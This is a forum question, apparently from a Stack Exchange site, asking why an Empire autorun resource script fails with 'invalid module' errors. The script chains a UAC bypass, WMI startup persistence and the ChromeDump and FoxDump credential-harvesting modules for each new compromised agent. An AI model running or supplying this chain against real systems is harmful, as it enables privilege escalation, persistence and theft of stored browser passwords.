# Empire Autorun Script

Tags: kali-linux

I'm tryng to run the following resource file when getting a new agent

```
usemodule privesc/bypassuac "name of the listener"
execute
y
back
usemodule persistence/elevated/wmi
set Listener "name of the listener"
set AtStartup True
execute
y
back
usemodule collection/ChromeDump
execute
y
back
usemodule collection/FoxDump
execute
y
back
```

by doing resource /root/script.rc

but I'm getting theses errors

```
[!] Error: invalid module
[!] Please choose 'ip_whitelist', 'ip_blacklist', 'obfuscate', or 'obfuscate_command'
[!] Please choose 'ip_whitelist', 'ip_blacklist', 'obfuscate', or 'obfuscate_command'
[!] Error: invalid module
[!] Error: invalid module
```

The following it's not related with autorun but if you could help too I would appreciate of tell me if it's necessary to create a new question for it

I'm trying also

```
usemodule privesc/bypassuac "name of the listener"
usemodule privesc/bypassuac
usemodule
```

And in all these attempts I'm geeting the error

```
[!] Error: invalid module
```

Can you help me on these?

Thanks

Comment: Are you using the actual name of the listener or are you actually executing `"name of the listener"`?

Comment: Do you have those modules?

Comment: Here "name of the listener" it was just an exemple and not what I'm using.
About the modules, they are on the lib/modules folder, yes